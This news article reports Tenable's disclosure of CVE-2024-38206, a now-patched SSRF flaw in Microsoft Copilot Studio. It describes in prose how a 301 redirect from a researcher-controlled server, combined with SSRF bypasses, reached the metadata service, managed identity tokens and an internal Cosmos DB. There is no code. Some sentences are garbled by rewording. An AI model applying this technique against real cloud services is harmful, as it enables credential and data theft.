close
close

first Drop

Com TW NOw News 2024

Microsoft Copilot Studio exploit leaks sensitive cloud data
news

Microsoft Copilot Studio exploit leaks sensitive cloud data

Researchers have exploited a vulnerability in Microsoft software. Copilot Studio Tool allowing them to make external HTTP requests that could access sensitive information about internal services within a cloud environment, potentially impacting multiple tenants.

Tenable researchers discovered the server-side request forgery (SSRF) flaw in the chatbot creation tool, which they exploited to gain access to Microsoft’s internal infrastructure, including the Instance Metadata Service (IMDS) and internal Cosmos DB instances. revealed in a blog post this week.

Followed by Microsoft as CVE-2024-38206The flaw allows an authenticated attacker to bypass SSRF protection in Microsoft Copilot Studio to leak sensitive cloud-based information over a network, according to a security advisory related to the vulnerability. The flaw occurs when an HTTP request that can be made using the tool is combined with an SSRF protection bypass, Tenable said.

“An SSRF vulnerability exists when an attacker can manipulate the application to make server-side HTTP requests to unexpected destinations or in unexpected ways,” Tenable Security researcher Evan Grant explained in the release.

The researchers tested their exploit to craft HTTP requests to access cloud data and services from multiple tenants. They found that “while no cross-tenant information appeared to be directly accessible, the infrastructure used for this Copilot Studio service was shared between tenants,” Grant wrote.

Any impact to that infrastructure could therefore affect multiple customers, he explained. “While we don’t know the extent to which read/write access to this infrastructure could have an impact, it’s clear that the risk is greater because it’s shared across tenants,” Grant said. The researchers also found that they could use their exploit to gain unrestricted access to other internal hosts on the local subnet their instance was on.

Microsoft responded quickly to Tenable’s report of the vulnerability and the vulnerability has since been fully patched. No action was required for Copilot Studio users, the company said in its security advisory.

How the CVE-2024-38206 vulnerability works

Microsoft released Copilot Studio late last year as a drag-and-drop, easy-to-use tool for building custom artificial intelligence (AI) assistants, also known as chatbots. These conversational applications allow people to perform a variety of large language models (LLM) and generative AI tasks using data ingested from within the Microsoft 365 environment, or other data provided by the Power Platform on which the tool is built.

The first release of Copilot Studio has recently was marked as generally “way too many permissions” by security researcher Michael Bargury at this year’s Black Hat conference in Las Vegas; he found 15 vulnerabilities with the tool that could allow the creation of flawed chatbots.

Tenable researchers discovered the tool’s SSRF flaw while looking for SSRF vulnerabilities in Microsoft’s Azure AI Studio and Azure ML Studio APIs, which the company flagged and patched before the researchers could report them. The researchers then turned their research attention to Copilot Studio to see if it could be exploited in a similar way.

Using HTTP requests to access the cloud

When creating a new Copilot, people can define Topics, which allow them to specify key phrases that a user can say to the Copilot to provoke a specific response or action from the AI; one of the actions that can be performed via Topics is an HTTP request. Most modern apps that deal with data analytics or machine learning have the ability to make these requests, due to their need to integrate data from external services; the downside is that it can create a potential vulnerability, Grant noted.

The researchers attempted to gain access to various cloud resources and leveraged common techniques for bypassing SSRF protection. HTTP requests. While many requests returned System Error responses, the researchers eventually assigned their request to a server they controlled and sent a 301 redirect response pointing to the restricted hosts they had previously attempted to request. And eventually, through trial and error, and a combination of redirects and SSRF bypasses, the researchers were able to retrieve managed identity access tokens from the IMDS to use to access internal cloud resources, such as Azure services and a Cosmos DB instance. They also exploited the flaw to gain read/write access to the database.

While the investigation was inconclusive about the extent to which the flaw could be exploited to gain access to sensitive cloud data, it was serious enough to warrant immediate action. Indeed, the existence of the SSRF flaw should be a cautionary tale for Copilot Studio users of the possibility that attackers could abuse the HTTP request functionality to escalate their access to cloud data and resources.

“If an attacker can control the targets of those requests, they can forward the request to a sensitive internal resource that the server application has access to even if the attacker does not, potentially exposing sensitive information,” Grant warned.